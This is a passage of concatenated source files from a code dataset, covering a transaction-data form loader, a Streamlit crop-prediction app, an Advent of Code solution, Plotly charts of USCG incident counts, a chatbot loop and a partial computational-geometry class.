data, starting from 0 to len(data)-1, x is the element, dictionary datatype\n for k, v in x.items(): # traverse through dictionary 'x' since it's dictionary format\n if k == A1C_INDEX: # for simplicity, just set A1C_INDEX to 'A1C_INDEX'\n value = float(v) # just in case 'v' is string or other format\n if value <= 5.7:\n out[i] = 1\n elif value <= 6.4:\n out[i] = 2\n elif value <= 9:\n out[i] = 3\n else: # this is when 'value' > 9\n out[i] = 4\n return out.tolist()\n\nprint(f'out is: {target_a1c(data)}')\n# when num_quarters is greater than length of 'data' list, the default value is 0, in this case, it's the last two values in 'out'\n# out is: [1, 2, 1, 3, 4, 0, 0]","sub_path":"OutOfBag/uncleCarl.py","file_name":"uncleCarl.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"546160646","text":"import com.ihsan.timeutils as timeutils\r\nimport com.ihsan.foundation.pobjecthelper as phelper\r\n\r\ndef FormSetDataEx(uideflist,params):\r\n config = uideflist.Config\r\n helper = phelper.PObjectHelper(config)\r\n recParam = params.FirstRecord\r\n\r\n if params.DatasetCount == 0 : return\r\n \r\n key = 'PObj:DistributionTransferInfo#DistributionId=%d' % recParam.DistributionId\r\n uideflist.SetData('uipDistTransInfo',key)\r\n \r\n oDistTransferInfo = helper.GetObject('DistributionTransferInfo', recParam.DistributionId)\r\n uipTransferInfo = uideflist.uipDistTransInfo.Dataset.GetRecord(0)\r\n uipTransferInfo.UsedAmount = (uipTransferInfo.DistributionAmount or 0.0) - (uipTransferInfo.Balance or 0.0)\r\n uipTransferInfo.TransactionDate = oDistTransferInfo.LTransaction.GetAsTDateTime('ActualDate')\r\n uipTransferInfo.TransactionNo = oDistTransferInfo.LTransaction.TransactionNo\r\n \r\n FillCATransaction(uideflist, helper, recParam.DistributionId)\r\n FillCARTransaction(uideflist, helper, recParam.DistributionId)\r\n \r\ndef FillCATransaction(uideflist, helper, DistributionId):\r\n config = helper.Config\r\n\r\n sOQL = \"\"\"\r\n select from CATransactItem\r\n [ distributiontransferid = :transferid ]\r\n ( LTransaction.TransactionNo\r\n , LTransaction.TransactionDate\r\n , LTransaction.ActualDate\r\n , LTransaction.Description\r\n , LTransaction.Inputer\r\n , LTransaction.TransactionId\r\n , Amount\r\n , self\r\n ) then order by TransactionNo, ActualDate;\r\n \"\"\"\r\n\r\n resOQL = config.OQLEngine.CreateOQL(sOQL)\r\n resOQL.SetParameterValueByName('transferid', DistributionId)\r\n\r\n resOQL.ApplyParamValues()\r\n\r\n resOQL.active = 1\r\n ds = resOQL.rawresult\r\n ds.First()\r\n\r\n while not ds.Eof:\r\n recCATrans = uideflist.uipListCATrans.Dataset.AddRecord()\r\n recCATrans.InputDate = timeutils.AsTDateTime(config, ds.TransactionDate)\r\n recCATrans.ActualDate = timeutils.AsTDateTime(config, ds.ActualDate)\r\n recCATrans.TransactionNo = ds.TransactionNo\r\n recCATrans.Amount = ds.Amount\r\n recCATrans.Description = ds.Description\r\n recCATrans.UserInput = ds.Inputer\r\n \r\n oCAReturnInfo = helper.GetObjectByNames('CashAdvanceReturnInfo',\r\n {'SourceTransactionId' : ds.TransactionId}\r\n )\r\n\r\n if oCAReturnInfo.isnull :\r\n recCATrans.ReturnStatus = 'F'\r\n else :\r\n recCATrans.ReturnStatus = 'T'\r\n \r\n ds.Next()\r\n \r\n \r\ndef FillCARTransaction(uideflist, helper, DistributionId):\r\n config = helper.Config\r\n\r\n sSQL = \"\"\"\r\n select t1.* , i.*, t2.TransactionNo\r\n from transaction.transaction t1\r\n , transaction.CashAdvanceReturnInfo i\r\n , transaction.transaction t2\r\n where\r\n 
t1.transactionid = i.returntransactionid\r\n and t2.transactionid = i.sourcetransactionid\r\n and exists(\r\n select 1\r\n from transaction.transactionitem ti\r\n , transaction.accounttransactionitem ac\r\n where ti.transactionitemid = ac.transactionitemid\r\n and ti.transactionid = i.sourcetransactionid\r\n and ac.distributiontransferid = %d\r\n )\r\n order by t2.TransactionNo, t1.actualdate\r\n \"\"\" % DistributionId\r\n\r\n ds = config.CreateSQL(sSQL).rawresult\r\n ds.First()\r\n\r\n while not ds.Eof:\r\n recCATrans = uideflist.uipListCARTrans.Dataset.AddRecord()\r\n recCATrans.InputDate = timeutils.AsTDateTime(config, ds.TransactionDate)\r\n recCATrans.ActualDate = timeutils.AsTDateTime(config, ds.ActualDate)\r\n recCATrans.TransactionNo = ds.TransactionNo\r\n recCATrans.SourceTransactionNo = ds.TransactionNo_1\r\n recCATrans.ReimburseAmount = ds.ReimburseAmount\r\n recCATrans.ReturnAmount = ds.ReturnAmount\r\n\r\n recCATrans.CAAmount = ds.Amount\r\n if ds.ReimburseAmount > 0.0 :\r\n recCATrans.Amount = ds.Amount + ds.ReimburseAmount\r\n elif ds.ReturnAmount > 0.0 :\r\n recCATrans.Amount = ds.Amount - ds.ReturnAmount\r\n else:\r\n recCATrans.Amount = ds.Amount\r\n \r\n recCATrans.Description = ds.Description\r\n recCATrans.UserInput = ds.Inputer\r\n\r\n\r\n\r\n \r\n\r\n ds.Next()\r\n","sub_path":"dialogs/Transaksi/fBranchDistributionDetail_data.py","file_name":"fBranchDistributionDetail_data.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"74846221","text":"import numpy as np\nimport pandas as pd\nimport streamlit as st\nimport pickle\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport plotly.figure_factory as ff\n\nmodel = pickle.load(open('model.pkl', 'rb'))\ndf = pd.read_csv(\"crop_prediction_model_one.csv\")\n\nconverts_dict = {\n 'Temperature': 'temperature',\n 'Humidity': 'humidity',\n}\n\ndef predict_crop(temperature, humidity):\n input = np.array([[temperature, humidity]]).astype(np.float64)\n prediction = model.predict(input)\n return prediction[0]\n\ndef scatterPlotDrawer(x,y):\n fig = plt.figure(figsize=(20,15))\n sns.set_style(\"whitegrid\")\n sns.scatterplot(data=df, x=x, y=y, hue=\"label\", size=\"label\", palette=\"deep\", sizes=(20, 200), legend=\"full\")\n plt.xlabel(x, fontsize=22)\n plt.ylabel(y, fontsize=22)\n plt.xticks(rotation=90, fontsize=18)\n plt.legend(prop={'size': 18})\n plt.yticks(fontsize=16)\n st.write(fig)\n\ndef barPlotDrawer(x,y):\n fig = plt.figure(figsize=(20,15))\n sns.set_style(\"whitegrid\")\n sns.barplot(data=df, x=x, y=y)\n plt.xlabel(\"Crops\", fontsize=22)\n plt.ylabel(y, fontsize=22)\n plt.xticks(rotation=90, fontsize=18)\n plt.legend(prop={'size': 18})\n plt.yticks(fontsize=16)\n st.write(fig)\n\ndef boxPlotDrawer(x,y):\n fig = plt.figure(figsize=(20,15))\n sns.set_style(\"whitegrid\")\n sns.boxplot(x=x, y=y, data=df)\n sns.despine(offset=10, trim=True)\n plt.xlabel(\"Crops\", fontsize=22)\n plt.ylabel(y, fontsize=22)\n plt.xticks(rotation=90, fontsize=18)\n plt.legend(prop={'size': 18})\n plt.yticks(fontsize=16)\n st.write(fig)\n\ndef main():\n html_temp_vis = \"\"\"\n
<div>\n<h1>Visualize Soil Properties</h1>\n</div>\n    \"\"\"\n\n    html_temp_pred = \"\"\"\n<div>\n<h1>Which Crop To Cultivate?</h1>\n</div>
\n \"\"\"\n\n st.sidebar.title(\"Select One\")\n select_type = st.sidebar.radio(\"\", ('Graph', 'Predict Your Crop'))\n\n\n if select_type == 'Graph':\n st.markdown(html_temp_vis, unsafe_allow_html=True)\n plot_type = st.selectbox(\"Select plot type\", ('Bar Plot', 'Scatter Plot', 'Box Plot'))\n st.subheader(\"Relation between features\")\n\n # Plot!\n\n x = \"\"\n y = \"\"\n\n if plot_type == 'Bar Plot':\n x = 'label'\n y = st.selectbox(\"Select a feature to compare between crops\",\n ('Temperature', 'Humidity'))\n if plot_type == 'Scatter Plot':\n x = st.selectbox(\"Select a property for 'X' axis\",\n ('Temperature', 'Humidity'))\n y = st.selectbox(\"Select a property for 'Y' axis\",\n ('Temperature', 'Humidity'))\n if plot_type == 'Box Plot':\n x = \"label\"\n y = st.selectbox(\"Select a feature\",\n ('Temperature', 'Humidity'))\n\n if st.button(\"Visulaize\"):\n if plot_type == 'Bar Plot':\n y = converts_dict[y]\n barPlotDrawer(x, y)\n if plot_type == 'Scatter Plot':\n x = converts_dict[x]\n y = converts_dict[y]\n scatterPlotDrawer(x, y)\n if plot_type == 'Box Plot':\n y = converts_dict[y]\n boxPlotDrawer(x, y)\n \n if select_type == \"Predict Your Crop\":\n st.markdown(html_temp_pred, unsafe_allow_html=True)\n st.header(\"To predict your crop give values\")\n st.subheader(\"Drag to Give Values\")\n temperature = st.slider('Temperature', 8.83, 43.68)\n humidity = st.slider('Humidity', 14.26, 99.98)\n \n if st.button(\"Predict your crop\"):\n output=predict_crop(temperature, humidity)\n res = \"“\"+ output.capitalize() + \"”\"\n st.success('The most suitable crop for your field is {}'.format(res))\n\nif __name__=='__main__':\n main()\n \n","sub_path":"Predict_Crop.py","file_name":"Predict_Crop.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"392365292","text":"#!/usr/bin/env python3\nfrom collections import defaultdict\nimport operator\n\nclass Day6:\n def __init__(self):\n indata = [14,0,15,12,11,11,3,5,1,6,8,4,9,1,8,4]\n tupp = tuple(indata)\n history = defaultdict(tuple)\n ll = len(indata)\n self.cycles = 0\n while tupp not in history:\n history[tupp] = self.cycles\n self.cycles += 1\n index, value = max(enumerate(indata), key=operator.itemgetter(1))\n indata[index] = 0\n while value > 0:\n index = (index + 1) % ll\n indata[index] += 1\n value -= 1\n tupp = tuple(indata)\n self.pt2 = self.cycles - history[tupp]\n\n def part1(self):\n return self.cycles\n\n def part2(self):\n return self.pt2\n","sub_path":"day6/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"160077072","text":"'''\r\n@author: Timothy Stephens\r\nMSC Charts for Security\r\n6/22/2020\r\n'''\r\n#Importing libraries relevant to intended graphs\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport plotly.express as px\r\nimport plotly.graph_objects as go\r\n\r\n#importing dataframes from excel file\r\ndataframe2013 = pd.read_excel(r\"C:\\Users\\steph\\OneDrive\\Desktop\\MSC Stuff\\MISLE Incident Data.xlsx\",sheet_name = \"2013\" )\r\ndataframe2014 = pd.read_excel(r\"C:\\Users\\steph\\OneDrive\\Desktop\\MSC Stuff\\MISLE Incident Data.xlsx\",sheet_name = \"2014\" )\r\ndataframe2015 = pd.read_excel(r\"C:\\Users\\steph\\OneDrive\\Desktop\\MSC Stuff\\MISLE Incident Data.xlsx\",sheet_name = \"2015\" )\r\ndataframe2016 = pd.read_excel(r\"C:\\Users\\steph\\OneDrive\\Desktop\\MSC Stuff\\MISLE 
Incident Data.xlsx\",sheet_name = \"2016\" )\r\ndataframe2017 = pd.read_excel(r\"C:\\Users\\steph\\OneDrive\\Desktop\\MSC Stuff\\MISLE Incident Data.xlsx\",sheet_name = \"2017\" )\r\ndataframe2018 = pd.read_excel(r\"C:\\Users\\steph\\OneDrive\\Desktop\\MSC Stuff\\MISLE Incident Data.xlsx\",sheet_name = \"2018\" )\r\ndataframe2019 = pd.read_excel(r\"C:\\Users\\steph\\OneDrive\\Desktop\\MSC Stuff\\MISLE Incident Data.xlsx\",sheet_name = \"2019\" )\r\ndataframe2020 = pd.read_excel(r\"C:\\Users\\steph\\OneDrive\\Desktop\\MSC Stuff\\MISLE Incident Data.xlsx\",sheet_name = \"2020\" )\r\n\r\n\r\n#creating a function to count events per month for a year, so 12 numbers total listed\r\ndef event_count(dataframe):\r\n eventlist = []\r\n month = 1\r\n counter = 0\r\n while month < 13:\r\n for x in dataframe:\r\n if x == month:\r\n counter += 1\r\n eventlist.append(counter)\r\n month += 1\r\n counter = 0\r\n return eventlist\r\n\r\n#separate function for polar charts since i have to recount January to close circle\r\ndef event_countP(dataframe):\r\n eventlist = []\r\n month = 1\r\n counter = 0\r\n while month < 13:\r\n for x in dataframe:\r\n if x == month:\r\n counter += 1\r\n eventlist.append(counter)\r\n month += 1\r\n counter = 0\r\n eventlist.append(eventlist[0])\r\n return eventlist\r\n\r\n\r\n\r\n \r\n#dataframes being made\r\n#note i add an extra january month and event value to complete the circle\r\ndata2013 = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December','January'],\r\n 'Events':event_countP(dataframe2013[\"Month\"])\r\n }\r\nvar2013 = pd.DataFrame(data2013,columns = ['Month','Events'])\r\n\r\ndata2014 = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December','January'],\r\n 'Events':event_countP(dataframe2014[\"Month\"])\r\n }\r\nvar2014 = pd.DataFrame(data2014,columns = ['Month','Events'])\r\n\r\ndata2015 = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December','January'],\r\n 'Events':event_countP(dataframe2015[\"Month\"])\r\n }\r\nvar2015 = pd.DataFrame(data2015,columns = ['Month','Events'])\r\n\r\ndata2016 = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December','January'],\r\n 'Events':event_countP(dataframe2016[\"Month\"])\r\n\r\n }\r\nvar2016 = pd.DataFrame(data2016,columns = ['Month','Events'])\r\n\r\ndata2017 = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December','January'],\r\n 'Events':event_countP(dataframe2017[\"Month\"])\r\n\r\n }\r\nvar2017 = pd.DataFrame(data2017,columns = ['Month','Events'])\r\n\r\ndata2018 = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December','January'],\r\n 'Events':event_countP(dataframe2018[\"Month\"])\r\n\r\n }\r\nvar2018 = pd.DataFrame(data2018,columns = ['Month','Events'])\r\n\r\ndata2019 = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December','January'],\r\n 'Events':event_countP(dataframe2019[\"Month\"])\r\n\r\n }\r\nvar2019 = pd.DataFrame(data2019,columns = ['Month','Events'])\r\n\r\ndata2020 = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December','January'],\r\n 
'Events':event_countP(dataframe2020[\"Month\"])\r\n\r\n }\r\nvar2020 = pd.DataFrame(data2020,columns = ['Month','Events'])\r\n\r\n\r\n#polar chart being made\r\n#format is the same for adding figures until satisfied \r\nfig = go.Figure()\r\n\r\nfig.add_trace(go.Scatterpolar(\r\n name = \"2013\",\r\n r = var2013[\"Events\"],\r\n theta = var2013[\"Month\"],\r\n mode = 'lines',\r\n\r\n connectgaps = True))\r\n\r\nfig.add_trace(go.Scatterpolar(\r\n name = \"2014\",\r\n r = var2014[\"Events\"],\r\n theta = var2014[\"Month\"],\r\n mode = 'lines',\r\n \r\n connectgaps = True))\r\n\r\nfig.add_trace(go.Scatterpolar(\r\n name = \"2015\",\r\n r = var2015[\"Events\"],\r\n theta = var2015[\"Month\"],\r\n mode = 'lines',\r\n\r\n connectgaps = True))\r\n\r\nfig.add_trace(go.Scatterpolar(\r\n name = \"2016\",\r\n r = var2016[\"Events\"],\r\n theta = var2016[\"Month\"],\r\n mode = 'lines',\r\n\r\n connectgaps = True))\r\n\r\nfig.add_trace(go.Scatterpolar(\r\n name = \"2017\",\r\n r = var2017[\"Events\"],\r\n theta = var2017[\"Month\"],\r\n mode = 'lines',\r\n\r\n connectgaps = True))\r\n\r\nfig.add_trace(go.Scatterpolar(\r\n name = \"2018\",\r\n r = var2018[\"Events\"],\r\n theta = var2018[\"Month\"],\r\n mode = 'lines',\r\n \r\n connectgaps = True))\r\n\r\nfig.add_trace(go.Scatterpolar(\r\n name = \"2019\",\r\n r = var2019[\"Events\"],\r\n theta = var2019[\"Month\"],\r\n mode = 'lines',\r\n\r\n connectgaps = True))\r\n\r\nfig.add_trace(go.Scatterpolar(\r\n name = \"2020\",\r\n r = var2020[\"Events\"],\r\n theta = var2020[\"Month\"],\r\n mode = 'lines',\r\n\r\n connectgaps = True))\r\n\r\n#layout stuff \r\nfig.update_layout(\r\n template=\"plotly_dark\",\r\n title = '[All] USCG Incidents per Calendar Month 2013 to 2020',\r\n\r\n )\r\n#figure being shown\r\nfig.show()\r\n\r\n#similar dataframes being made\r\n#note i remove an extra january month and event value since its not a circle\r\ndata2013B = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December'],\r\n 'Events': event_count(dataframe2013[\"Month\"])\r\n }\r\nvar2013B = pd.DataFrame(data2013B,columns = ['Month','Events'])\r\n\r\ndata2014B = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December'],\r\n 'Events': event_count(dataframe2014[\"Month\"])\r\n }\r\nvar2014B = pd.DataFrame(data2014B,columns = ['Month','Events'])\r\n\r\ndata2015B = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December'],\r\n 'Events': event_count(dataframe2015[\"Month\"])\r\n }\r\nvar2015B = pd.DataFrame(data2015B,columns = ['Month','Events'])\r\n\r\ndata2016B = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December'],\r\n 'Events': event_count(dataframe2016[\"Month\"])\r\n }\r\nvar2016B = pd.DataFrame(data2016B,columns = ['Month','Events'])\r\n\r\ndata2017B = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December'],\r\n 'Events': event_count(dataframe2017[\"Month\"])\r\n }\r\nvar2017B = pd.DataFrame(data2017B,columns = ['Month','Events'])\r\n\r\ndata2018B = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December'],\r\n 'Events': event_count(dataframe2018[\"Month\"])\r\n }\r\nvar2018B = pd.DataFrame(data2018B,columns = ['Month','Events'])\r\n\r\ndata2019B = {'Month': 
['January','February','March','April','May','June','July','August','September','October','November','December'],\r\n 'Events': event_count(dataframe2019[\"Month\"])\r\n }\r\nvar2019B = pd.DataFrame(data2019B,columns = ['Month','Events'])\r\n\r\ndata2020B = {'Month': ['January','February','March','April','May','June','July','August','September','October','November','December'],\r\n 'Events': event_count(dataframe2020[\"Month\"])\r\n }\r\nvar2020B = pd.DataFrame(data2020B,columns = ['Month','Events'])\r\n\r\n\r\n\r\n#line chart being made\r\nfig2 = go.Figure()\r\n\r\nfig2.add_trace(go.Scatter(\r\n name = \"2013\",\r\n x=var2013B[\"Month\"],\r\n y=var2013B[\"Events\"],\r\n mode= 'lines'))\r\n\r\nfig2.add_trace(go.Scatter(\r\n name = \"2014\",\r\n x=var2014B[\"Month\"],\r\n y=var2014B[\"Events\"],\r\n mode= 'lines'))\r\n\r\nfig2.add_trace(go.Scatter(\r\n name = \"2015\",\r\n x=var2015B[\"Month\"],\r\n y=var2015B[\"Events\"],\r\n mode= 'lines'))\r\n\r\nfig2.add_trace(go.Scatter(\r\n name = \"2016\",\r\n x=var2016B[\"Month\"],\r\n y=var2016B[\"Events\"],\r\n mode= 'lines'))\r\n\r\nfig2.add_trace(go.Scatter(\r\n name = \"2017\",\r\n x=var2017B[\"Month\"],\r\n y=var2017B[\"Events\"],\r\n mode= 'lines'))\r\n\r\nfig2.add_trace(go.Scatter(\r\n name = \"2018\",\r\n x=var2018B[\"Month\"],\r\n y=var2018B[\"Events\"],\r\n mode= 'lines'))\r\n\r\nfig2.add_trace(go.Scatter(\r\n name = \"2019\",\r\n x=var2019B[\"Month\"],\r\n y=var2019B[\"Events\"],\r\n mode= 'lines'))\r\n\r\nfig2.add_trace(go.Scatter(\r\n name = \"2020\",\r\n x=var2020B[\"Month\"],\r\n y=var2020B[\"Events\"],\r\n mode= 'lines'))\r\n\r\n\r\n\r\nfig2.update_layout(\r\n template=\"plotly_dark\",\r\n title = '[All] USCG Incidents per Calendar Month 2013 to 2020',\r\n\r\n )\r\n#figure being shown\r\nfig2.show()\r\n \r\n\r\n","sub_path":"All MultiLine Graphs (2013-2020).py","file_name":"All MultiLine Graphs (2013-2020).py","file_ext":"py","file_size_in_byte":9461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"446258999","text":"from Bot import contextual as ctl\n\nv = ctl.Bot()\nv.organize_data('intents.json')\nv.remove_duplicates()\nv.trainer()\nv.neural_network()\n\nwhile True:\n\ti = input(\"Want to continue? 
\")\n\tif i == '1':\n\t\tn = input('your question ')\n\t\tv.response(n)\n\telse:\n\t\tbreak","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"486017726","text":"import time\nimport sys\nimport math\n\n\ndef DEBUG(x):\n print(\"[%d ms]#\" % (time.time() * 1000 % 100000), x, file=sys.stderr)\n sys.stderr.flush()\n\n\nclass Pos():\n def __init__(self, x, y): self._p = x, y\n\n def __str__(self): return \"(%s,%s)\" % self._p\n\n def __eq__(self, other): return self._p == other._p\n\n def intStr(self): return \"%d %d\" % self._p\n\n def get(self): return self._p\n\n def copy(self):\n x, y = self._p\n return Pos(x, y)\n\n def dist(self, other):\n x, y = self._p\n xo, yo = other._p\n dx, dy = x - xo, y - yo\n return math.sqrt(dx * dx + dy * dy)\n\n def middle(self, p2):\n x1, y1 = self.get()\n x2, y2 = p2.get()\n return Pos((x1 + x2) / 2, (y1 + y2) / 2)\n\n def add(self, x, y):\n x1, y1 = self.get()\n return Pos(x1 + x, y1 + y)\n\n def coef(self, k):\n x, y = self._p\n return Pos(int(x * k), int(y * k))\n\n def force_inside(self):\n x, y = self._p\n self._p = (min(max(int(x), 0), w - 1), min(max(int(y), 0), h - 1))\n\n def force_on_grid(self):\n self._p = tuple([int(i) for i in self._p])\n\n\ndef symm(p, pCenter, k=1):\n x, y = p.get()\n x0, y0 = pCenter.get()\n return pCenter.add(x0 - x * k, y0 - y * k)\n\n\nclass Line():\n def __init__(self, p1, p2, pCenter=None):\n self._p1, self._p2 = p1, p2\n \"\"\" construct a line passing by p1 and p2\"\"\"\n if p1 == p2: raise Exception(\"Cannot draw a line with only one point\")\n x1, y1 = p1.get()\n x2, y2 = p2.get()\n dx = x1 - x2\n dy = y1 - y2\n a, b = dy, -dx\n if pCenter: x1, y1 = pCenter.get()\n c = a * x1 + b * y1\n g = 1\n if a == 0.0:\n g = b\n elif b == 0.0:\n g = a\n elif abs(int(a) - a) < 0.00000001 and abs(int(b) - b) < 0.00000001:\n g = math.gcd(int(a), int(b))\n self._def = (a / g, b / g, c / g)\n self._dx, self._dy = dx / g, dy / g\n\n def isOn(self, p):\n (a, b, c) = self._def\n x, y = p.get()\n return abs(a * x + b * y - c) < 0.000001\n\n def sgn(self, p):\n (a, b, c) = self._def\n x, y = p.get()\n v = a * x + b * y - c\n if v < -0.00001: return -1\n if v > 0.00001: return 1\n return 0\n\n def ortho(self, p):\n \"\"\" return a line orthogonal to self, passing by \"p\" \"\"\"\n pCenter = self._p1.middle(self._p2)\n p1 = pCenter.add(self._dy, -self._dx)\n p2 = pCenter.add(-self._dy, self._dx)\n return Line(p1, p2, pCenter=p)\n\n def __str__(self):\n (a, b, c) = self._def\n l = []\n if a == 1:\n l.append(\"x\")\n elif a != 0:\n l.append(\"%s*x\" % a)\n if b == 1:\n l.append(\"y\")\n elif b != 0:\n l.append(\"%s*y\" % b)\n return \"Ln[\" + \" + \".join(l) + \" = %s\" % (c) + \"]\"\n\n def intersect(self, line):\n (a, b, c) = self._def\n (A, B, C) = line._def\n div = (A * b - B * a)\n if div == 0: return None # parallel\n y = (A * c - C * a) / div\n x = (C * b - B * c) / div\n p = Pos(x, y)\n if not self.isOn(p): raise Exception(\"intersect error 1\")\n if not self.isOn(p): raise Exception(\"intersect error 2\")\n return p\n\n def dx_dy(self):\n (a, b, c) = self._def\n if abs(int(a) - a) < 0.00000001 and abs(int(b) - b) < 0.00000001: return (-int(b), int(a))\n return (0, 0)\n\n\n##############(###########################\n##### SEGMENT\n#########################################\nclass Segment():\n def __str__(self):\n return \"SEGMENT[ %s from <%s> to <%s> (%d)]\" % (self.line, self.p1, self.p2, 
self._sgn)\n\n def __init__(self, p1, p2, p_in=None):\n self.p1, self.p2 = p1, p2\n self.p_in = p_in\n self.line = Line(p1, p2)\n if self.p_in:\n self._sgn = self.line.sgn(p_in)\n else:\n self._sgn = 0\n # DEBUG(\"Create %s\"%self)\n\n def copy(self):\n return Segment(self.p1, self.p2, self.p_in)\n\n def inside(self, p):\n s = self.line.sgn(p)\n return s == 0 or s == self._sgn\n\n def length(self):\n return self.p1.dist(self.p2)\n\n\n#########################################\n##### POLYEDRE\n#########################################\nclass Polyedre():\n def __init__(self):\n bounds = [Pos(-0.1, -0.1), Pos(w - 0.9, -0.1), Pos(w - 0.9, h - 0.9), Pos(-0.1, h - 0.9)]\n p_in = Pos(w // 2, h // 2)\n self.seg = [Segment(bounds[i], bounds[(i + 1) % len(bounds)], p_in) for i in range(len(bounds))]\n self._single_seg = None\n\n def is_1d(self):\n return bool(self._single_seg)\n\n def __str__(self):\n return \"Poly[%s]\" % (\";\".join([\"%s\" % p.p1 for p in self.seg]))\n\n def copy(self):\n res = Polyedre()\n res.seg = [s.copy() for s in self.seg]\n if res._single_seg:\n l, p1, p2, possible = res._single_seg\n self._single_seg = (l.copy(), p1.copy(), p2.cop(), possible[:])\n return res\n\n def isInside(self, p):\n if self._single_seg:\n _, _, _, poss = self._single_seg\n return p in poss\n for seg in self.seg:\n if not seg.inside(p):\n # DEBUG(\"%s not inside because of %s\"%(p, point))\n return False\n return True\n\n def addLine(self, line, p_in):\n '''\n Cut polyedre by a new line. The given point defines which side is in\n '''\n sgn = line.sgn(p_in)\n if self._single_seg:\n l, p1, p2, possible = self._single_seg\n DEBUG(\"Cut %s / %s\" % (l, line))\n pi = l.intersect(line)\n if not pi: return\n out1 = line.sgn(p1) != sgn\n out2 = line.sgn(p2) != sgn\n if out1 and out2:\n raise Exception(\"???\")\n elif out1:\n p1 = pi\n elif out2:\n p2 = pi\n else:\n return\n self._single_seg = (line, p1.copy(), p2.copy(), possible)\n self.seg = [Segment(p1, p2)]\n return\n # DEBUG(\"Adding line %s / %s\"%(line,p_in))\n # find intersection point (p_in is inside)\n p1merge = None\n p2merge = None\n deleted = False\n for p in self.seg[:]:\n out1 = line.sgn(p.p1) != sgn\n out2 = line.sgn(p.p2) != sgn\n if out1 and out2: # line to be removed\n # DEBUG (\"Line %s is now outside\"%p.line)\n deleted = True\n self.seg.remove(p)\n elif out1:\n # DEBUG (\"Point %s from %s is now outside\"%(p.p1,p.line))\n # replace p1 by intersection\n p.p1 = p.line.intersect(line)\n # DEBUG(\"Intersect1:%s\"%p.p1)\n if p1merge: raise Exception(\"Unexpected multiple intersect\")\n p1merge = p.p1\n elif out2:\n # DEBUG (\"Point %s from %s is now outside\"%(p.p2,p.line))\n # replace p2 by intersection\n p.p2 = p.line.intersect(line)\n # DEBUG(\"Intersect2:%s\"%p.p2)\n if p2merge: raise Exception(\"Unexpected multiple intersect\")\n p2merge = p.p2\n if p1merge or p2merge or deleted:\n if not (p1merge and p2merge): raise Exception(\"Incomplete intersection\")\n if p1merge != p2merge:\n self.seg.append(Segment(p2merge, p1merge, p_in))\n\n # else:raise (\"Unexpected add line with no new restrictions\")\n\n # The area is restricted to a single line (SAME)\n def on_line(self, line):\n if self._single_seg:\n l, p1, p2, _ = self._single_seg\n p = line.intersect(l)\n DEBUG(\"Intesect %s %s\" % (l, line))\n if p:\n self._single_seg = (line, p.copy(), p.copy(), [p])\n return [p]\n else:\n pm = p1.middle(p2)\n pm.force_on_grid()\n self._single_seg = (line, pm.copy(), pm.copy(), [pm])\n return [pm]\n # Search intersetions\n pts = []\n for s in 
self.seg[:]:\n pt = s.line.intersect(line)\n if pt and self.isInside(pt):\n pts.append(pt)\n if len(pts) != 2:\n raise Exception(\"???\")\n p1, p2 = pts\n DEBUG(\"Intersect point:%s,%s\" % (p1, p2))\n dx, dy = line.dx_dy()\n DEBUG(\"dx_dy:%s,%s\" % (dx, dy))\n # find a point on line\n x0, y0 = 0, 0\n p = None\n pm = p1.middle(p2)\n pm.force_on_grid()\n p0 = pm\n while not p:\n if line.isOn(p0):\n p = p0\n break\n x0 += 1\n if x0 > abs(dx):\n x0 = 0\n y0 += 1\n if y0 > abs(dy): raise Exception(\"???\")\n p0 = pm.add(x0, y0)\n DEBUG(\"Found point on line:%s\" % p)\n\n possible = [p.copy()]\n p0 = p.add(dx, dy)\n while self.isInside(p0):\n possible.append(p0)\n p0 = p0.add(dx, dy)\n dx, dy = -dx, -dy\n p0 = p.add(dx, dy)\n while self.isInside(p0):\n possible.append(p0)\n p0 = p0.add(dx, dy)\n self._single_seg = (line, p1.copy(), p2.copy(), possible)\n self.seg = [Segment(p1, p2)]\n return possible[:]\n\n def size(self):\n xM, yM = 0, 0\n xm, ym = w, h\n for p in self.seg:\n x, y = p.p1.get()\n xM = max(xM, x)\n xm = min(xm, x)\n yM = max(yM, y)\n ym = min(ym, y)\n return (int(xm - 0.5), int(ym - 0.5), int(xM + 0.5), int(yM + 0.5))\n\n def center(self):\n # ponderation by the length of segments\n x, y = 0, 0\n nb = 0.0\n for p in self.seg:\n k = p.p1.dist(p.p2)\n dx, dy = p.p1.get()\n x, y = x + dx * k, y + dy * k\n dx, dy = p.p2.get()\n x, y = x + dx * k, y + dy * k\n nb = nb + 2 * k\n return Pos(x / nb, y / nb)\n\n def intersect(self, line):\n if self._single_seg:\n l, p1, p2, possible = self._single_seg\n p = l.intersect(line)\n if p and self.isInside(p): return [p]\n return []\n res = []\n for s in self.seg:\n p = s.line.intersect(line)\n if p is None: continue\n if self.isInside(p): res.append(p)\n return res\n\n def aPointFarFrom(self, p):\n if self._single_seg:\n l, p1, p2, possible = self._single_seg\n dM = 0\n res = None\n for pp in possible:\n d = pp.dist(p)\n if 